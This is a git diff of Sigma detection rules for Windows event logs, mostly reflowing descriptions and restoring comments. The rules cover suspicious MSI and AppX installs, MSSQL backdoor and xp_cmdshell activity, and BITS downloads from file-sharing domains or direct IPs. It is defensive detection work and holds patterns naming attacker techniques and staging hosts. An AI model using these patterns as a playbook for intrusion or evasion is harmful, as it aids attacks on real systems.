a/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml +++ b/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml @@ -22,5 +22,6 @@ detection: condition: application and selection falsepositives: - Unknown +# Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low ruletype: Sigma diff --git a/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml b/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml index e7869d165..9478ade79 100644 --- a/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml +++ b/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application @@ -21,19 +22,20 @@ detection: - 1040 - 1042 Data|contains: + # Add more suspicious paths - :\Windows\TEMP\ - \\\\ - \Desktop\ - \PerfLogs\ - \Users\Public\ + # - '\AppData\Local\Temp\' # too many FPs + # - '\Downloads\' # too many FPs, typical legitimate staging directory filter_winget: Data|contains: \AppData\Local\Temp\WinGet\ filter_updhealthtools: Data|contains: C:\Windows\TEMP\UpdHealthTools.msi condition: application and (selection and not 1 of filter_*) falsepositives: - - False positives may occur if you allow installation from folders such as the - desktop, the public folder or remote shares. A baseline is required before - production use. + - False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use. level: medium ruletype: Sigma diff --git a/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml b/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml index 72879d895..f0c178ed5 100644 --- a/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml +++ b/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml b/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml index c5cc481e8..b695e6db2 100644 --- a/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml +++ b/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml @@ -1,8 +1,7 @@ title: Atera Agent Installation id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43 status: test -description: Detects successful installation of Atera Remote Monitoring & Management - (RMM) agent as recently found to be used by Conti operators +description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators references: - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent author: Bhabesh Raj diff --git a/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml b/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml index 83340d93d..3bcadd343 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml @@ -1,8 +1,7 @@ title: MSSQL Add Account To Sysadmin Role id: 08200f85-2678-463e-9c32-88dce2f073d1 status: test -description: Detects when an attacker tries to backdoor the MSSQL server by adding - a backdoor account to the sysadmin fixed server role +description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ author: Nasreddine Bencherchali (Nextron Systems) @@ -12,8 +11,8 @@ tags: logsource: product: windows service: application - definition: MSSQL audit policy must be enabled in order to receive this event - in the application log + definition: MSSQL audit policy must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml b/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml index 9c893f654..298387a03 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml @@ -1,8 +1,7 @@ title: MSSQL Disable Audit Settings id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df status: test -description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER - AUDIT" transaction in order to delete or disable audit logs on the server +description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16 @@ -14,8 +13,8 @@ tags: logsource: product: windows service: application - definition: MSSQL audit policy must be enabled in order to receive this event - in the application log + definition: MSSQL audit policy must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application @@ -27,7 +26,6 @@ detection: - statement:DROP SERVER AUDIT condition: application and selection falsepositives: - - This event should only fire when an administrator is modifying the audit policy. - Which should be a rare occurrence once it's set up + - This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up level: high ruletype: Sigma diff --git a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml index fe64372b6..970cf5f14 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml @@ -1,8 +1,8 @@ title: MSSQL Server Failed Logon id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 related: - - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d - type: similar + - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d + type: similar status: experimental description: Detects failed logon attempts from clients to MSSQL server. author: Nasreddine Bencherchali (Nextron Systems), j4son @@ -25,8 +25,6 @@ detection: EventID: 18456 condition: application and selection falsepositives: - - This event could stem from users changing an account's password that's used - to authenticate via a job or an automated process. Investigate the source - of such events and mitigate them + - This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them level: low ruletype: Sigma diff --git a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml index 2081e72e8..ef8d21ed4 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml @@ -1,11 +1,10 @@ title: MSSQL Server Failed Logon From External Network id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d related: - - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 - type: similar + - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 + type: similar status: experimental -description: Detects failed logon attempts from clients with external network IP to - an MSSQL server. This can be a sign of a bruteforce attack. +description: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack. author: j4son date: 2023/10/11 references: @@ -26,8 +25,8 @@ detection: EventID: 18456 filter_main_local_ips: Data|contains: - - 'CLIENT: 10.' - - 'CLIENT: 172.16.' + - 'CLIENT: 10.' # filter_range_IP: 10.0.0.0/8 + - 'CLIENT: 172.16.' # filter_range_IP: 172.16.0.0/12 - 'CLIENT: 172.17.' - 'CLIENT: 172.18.' - 'CLIENT: 172.19.' @@ -43,9 +42,9 @@ detection: - 'CLIENT: 172.29.' - 'CLIENT: 172.30.' - 'CLIENT: 172.31.' - - 'CLIENT: 192.168.' - - 'CLIENT: 127.' - - 'CLIENT: 169.254.' + - 'CLIENT: 192.168.' # filter_range_IP: 192.168.0.0/16 + - 'CLIENT: 127.' # filter_loop_back: 127.0.0.0/8 + - 'CLIENT: 169.254.' # fileter_link-local_addressing: 169.254.0.0/16 condition: application and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml b/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml index babe00faa..bf3ad3fc7 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml @@ -1,9 +1,7 @@ title: MSSQL SPProcoption Set id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964 status: test -description: Detects when the a stored procedure is set or cleared for automatic execution - in MSSQL. A stored procedure that is set to automatic execution runs every time - an instance of SQL Server is started +description: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16 @@ -14,8 +12,8 @@ tags: logsource: product: windows service: application - definition: MSSQL audit policy to monitor for 'sp_procoption' must be enabled - in order to receive this event in the application log + definition: MSSQL audit policy to monitor for 'sp_procoption' must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml index 52592d402..6ad6865d4 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml @@ -1,8 +1,7 @@ title: MSSQL XPCmdshell Suspicious Execution id: 7f103213-a04e-4d59-8261-213dddf22314 status: test -description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute - commands +description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ @@ -13,8 +12,8 @@ tags: logsource: product: windows service: application - definition: MSSQL audit policy to monitor for 'xp_cmdshell' must be enabled in - order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012) + definition: MSSQL audit policy to monitor for 'xp_cmdshell' must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012) + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application @@ -22,6 +21,7 @@ detection: Provider_Name: MSSQLSERVER EventID: 33205 Data|contains|all: + # You can modify this to include specific commands - object_name:xp_cmdshell - statement:EXEC condition: application and selection diff --git a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml index abbab96ce..bff8d735d 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application @@ -22,7 +23,6 @@ detection: condition: application and selection falsepositives: - Legitimate enable/disable of the setting - - Note that since the event contain the change for both values. This means that - this will trigger on both enable and disable + - Note that since the event contain the change for both values. This means that this will trigger on both enable and disable level: high ruletype: Sigma diff --git a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml index ba4578c7e..f00075407 100644 --- a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml +++ b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml @@ -1,8 +1,8 @@ title: Remote Access Tool - ScreenConnect Command Execution id: 076ebe48-cc05-4d8f-9d41-89245cd93a14 related: - - id: b1f73849-6329-4069-bc8f-78a604bb8b23 - type: similar + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar status: experimental description: Detects command execution via ScreenConnect RMM references: diff --git a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml index 217afc973..7de1939eb 100644 --- a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml +++ b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml @@ -1,8 +1,8 @@ title: Remote Access Tool - ScreenConnect File Transfer id: 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13 related: - - id: b1f73849-6329-4069-bc8f-78a604bb8b23 - type: similar + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar status: experimental description: Detects file being transferred via ScreenConnect RMM references: diff --git a/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml b/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml index 3fe7aeb4c..d711bf9ba 100644 --- a/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml +++ b/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml @@ -1,8 +1,7 @@ title: Microsoft Malware Protection Engine Crash - WER id: 6c82cf5c-090d-4d57-9188-533577631108 status: experimental -description: This rule detects a suspicious crash of the Microsoft Malware Protection - Engine +description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine references: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 - https://technet.microsoft.com/en-us/library/security/4022344 @@ -16,6 +15,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml b/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml index 4eafe596c..a6d7b1156 100644 --- a/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml +++ b/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml @@ -1,9 +1,7 @@ title: File Was Not Allowed To Run id: 401e5d00-b944-11ea-8f9a-00163ecd60ae status: test -description: Detect run not allowed files. Applocker is a very useful tool, especially - on servers where unprivileged users have access. For example terminal servers. - You need configure applocker and log collect to receive these events. +description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker diff --git a/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml b/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml index 8fd968827..a7570e1a5 100644 --- a/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml +++ b/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml @@ -1,9 +1,7 @@ title: Sysinternals Tools AppX Versions Execution id: d29a20b2-be4b-4827-81f2-3d8a59eab5fc status: experimental -description: Detects execution of Sysinternals tools via an AppX package. Attackers - could install the Sysinternals Suite to get access to tools such as psexec and - procdump to avoid detection based on System paths +description: Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml index 39332071e..d19949cf8 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml @@ -1,8 +1,7 @@ title: Potential Malicious AppX Package Installation Attempts id: 09d3b48b-be17-47f5-bf4e-94e7e75d09ce status: test -description: Detects potential installation or installation attempts of known malicious - appx packages +description: Detects potential installation or installation attempts of known malicious appx packages references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ @@ -22,10 +21,11 @@ detection: EventID: - 400 - 401 + # Add more malicious package names + # TODO: Investigate the packages here https://github.com/sophoslabs/IoCs/blob/master/Troj-BazarBackdoor.csv based on this report https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ PackageFullName|contains: 3669e262-ec02-4e9d-bcb4-3d008b4afac9 condition: appxdeployment_server and selection falsepositives: - - Rare occasions where a malicious package uses the exact same name and version - as a legtimate application + - Rare occasions where a malicious package uses the exact same name and version as a legtimate application level: medium ruletype: Sigma diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml index 41c2356ff..99d4f86f5 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml @@ -1,8 +1,7 @@ title: Deployment Of The AppX Package Was Blocked By The Policy id: e021bbb5-407f-41f5-9dc9-1864c45a7a51 status: test -description: Detects an appx package deployment that was blocked by the local computer - policy +description: Detects an appx package deployment that was blocked by the local computer policy references: - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml index 40a71464e..f820524a8 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml @@ -1,9 +1,7 @@ title: Suspicious AppX Package Installation Attempt id: 898d5fc9-fbc3-43de-93ad-38e97237c344 status: test -description: Detects an appx package installation with the error code "0x80073cff" - which indicates that the package didn't meet the signing requirements and could - be suspicious +description: Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -21,7 +19,7 @@ detection: Channel: Microsoft-Windows-AppXDeploymentServer/Operational selection: EventID: 401 - ErrorCode: '0x80073cff' + ErrorCode: '0x80073cff' # Check ref section to learn more about this error code condition: appxdeployment_server and selection falsepositives: - Legitimate AppX packages not signed by MS used part of an enterprise diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml index 0f26b76b9..c43119920 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml @@ -1,8 +1,7 @@ title: Suspicious Remote AppX Package Locations id: 8b48ad89-10d8-4382-a546-50588c410f0d status: experimental -description: Detects an appx package added the pipeline of the "to be processed" packages - which is downloaded from a suspicious domain +description: Detects an appx package added the pipeline of the "to be processed" packages which is downloaded from a suspicious domain references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -22,7 +21,7 @@ detection: selection: EventID: 854 Path|contains: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml index 52419b27c..9e2770315 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml @@ -1,8 +1,7 @@ title: Suspicious AppX Package Locations id: 5cdeaf3d-1489-477c-95ab-c318559fc051 status: test -description: Detects an appx package added the pipeline of the "to be processed" packages - which is located in suspicious locations +description: Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -21,6 +20,7 @@ detection: selection: EventID: 854 Path|contains: + # Paths can be written using forward slash if the "file://" protocol is used - C:\Users\Public\ - /users/public/ - C:\PerfLogs\ diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml index 988a135fd..ee7ec5baa 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml @@ -1,8 +1,7 @@ title: Uncommon AppX Package Locations id: c977cb50-3dff-4a9f-b873-9290f56132f1 status: test -description: Detects an appx package added the pipeline of the "to be processed" packages - which is located in uncommon locations +description: Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -22,17 +21,18 @@ detection: EventID: 854 filter_generic: Path|contains: + # Paths can be written using forward slash if the "file://" protocol is used - C:\Program Files\WindowsApps\ - C:\Program Files (x86)\ - C:\Windows\SystemApps\ - C:\Windows\PrintDialog\ - C:\Windows\ImmersiveControlPanel\ - x-windowsupdate:// - - file:///C:/Program%20Files + - file:///C:/Program%20Files # Also covers 'file:///C:/Program%20Files%20(x86)/' filter_specific: Path|contains: - https://statics.teams.cdn.office.net/ - - microsoft.com + - microsoft.com # Example: https://go.microsoft.com/fwlink/?linkid=2160968 condition: appxdeployment_server and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml b/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml index 57ddd7eda..88a35c0f0 100644 --- a/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml +++ b/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml @@ -1,8 +1,7 @@ title: Suspicious Digital Signature Of AppX Package id: b5aa7d60-c17e-4538-97de-09029d6cd76b status: test -description: Detects execution of AppX packages with known suspicious or malicious - signature +description: Detects execution of AppX packages with known suspicious or malicious signature references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -19,9 +18,8 @@ detection: Channel: Microsoft-Windows-AppxPackaging/Operational selection: EventID: 157 - subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North - York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, - OID.2.5.4.15=Private Organization + # Add more known suspicious/malicious certificates used in different attacks + subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization condition: appxpackaging_om and selection falsepositives: - Unknown diff --git a/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml b/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml index 915f06d18..8111d31e2 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml @@ -22,7 +22,6 @@ detection: processPath|endswith: \bitsadmin.exe condition: bits_client and selection falsepositives: - - Many legitimate applications or scripts could leverage "bitsadmin". This event - is best correlated with EID 16403 via the JobID field + - Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobID field level: low ruletype: Sigma diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml index 3196dcf29..fa21ec421 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml @@ -1,8 +1,7 @@ title: BITS Transfer Job Downloading File Potential Suspicious Extension id: b85e5894-9b19-4d86-8c87-a2f3b81f0521 status: experimental -description: Detects new BITS transfer job saving local files with potential suspicious - extensions +description: Detects new BITS transfer job saving local files with potential suspicious extensions references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md author: frack113 @@ -21,9 +20,10 @@ detection: selection: EventID: 16403 LocalName|endswith: + # TODO: Extend this list with more interesting file extensions - .bat - .dll - - .exe + - .exe # TODO: Might wanna comment this if it generates tons of FPs - .hta - .ps1 - .psd1 @@ -31,11 +31,11 @@ detection: - .vbe - .vbs filter_optional_generic: + # Typical updates: Chrome, Dropbox etc. LocalName|contains: \AppData\ RemoteName|contains: .com condition: bits_client and (selection and not 1 of filter_optional_*) falsepositives: - - While the file extensions in question can be suspicious at times. It's best - to add filters according to your environment to avoid large amount false positives + - While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives level: medium ruletype: Sigma diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml index 300977f74..1a7525653 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml @@ -22,7 +22,7 @@ detection: selection: EventID: 16403 RemoteName|contains: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml index 58a073376..084075335 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml @@ -1,8 +1,8 @@ title: BITS Transfer Job Download From Direct IP id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 related: - - id: 99c840f2-2012-46fd-9141-c761987550ef - type: similar + - id: 99c840f2-2012-46fd-9141-c761987550ef + type: similar status: experimental description: Detects a BITS transfer job downloading file(s) from a direct IP address. references: @@ -46,9 +46,9 @@ detection: - https://9 filter_optional_local_networks: RemoteName|contains: - - ://10. - - ://192.168. - - ://172.16. + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 - ://172.17. - ://172.18. - ://172.19. @@ -64,10 +64,11 @@ detection: - ://172.29. - ://172.30. - ://172.31. - - ://127. - - ://169.254. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 filter_optional_seven_zip: RemoteName|contains: + # For https://7-zip.org/ - https://7- - http://7- condition: bits_client and (selection and not 1 of filter_optional_*) diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml index b295a566b..7796f954c 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml @@ -1,9 +1,7 @@ title: BITS Transfer Job With Uncommon Or Suspicious Remote TLD id: 6d44fb93-e7d2-475c-9d3d-54c9c1e33427 status: experimental -description: Detects a suspicious download using the BITS client from a FQDN that - is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up - after malicious payloads. +description: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md - https://twitter.com/malmoeb/status/1535142803075960832 @@ -27,11 +25,9 @@ detection: - .azureedge.net/ - .com/ - .sfx.ms/ - - download.mozilla.org/ + - download.mozilla.org/ # https://download.mozilla.org/?product=firefox-101.0.1-partial-101.0&os=win64&lang=en-US condition: bits_client and (selection and not 1 of filter_main_*) falsepositives: - - This rule doesn't exclude other known TLDs such as ".org" or ".net". It's recommended - to apply additional filters for software and scripts that leverage the BITS - service + - This rule doesn't exclude other known TLDs such as ".org" or ".net". It's recommended to apply additional filters for software and scripts that leverage the BITS service level: medium ruletype: Sigma diff --git a/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml b/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml index d7f010724..f96ad5b9f 100644 --- 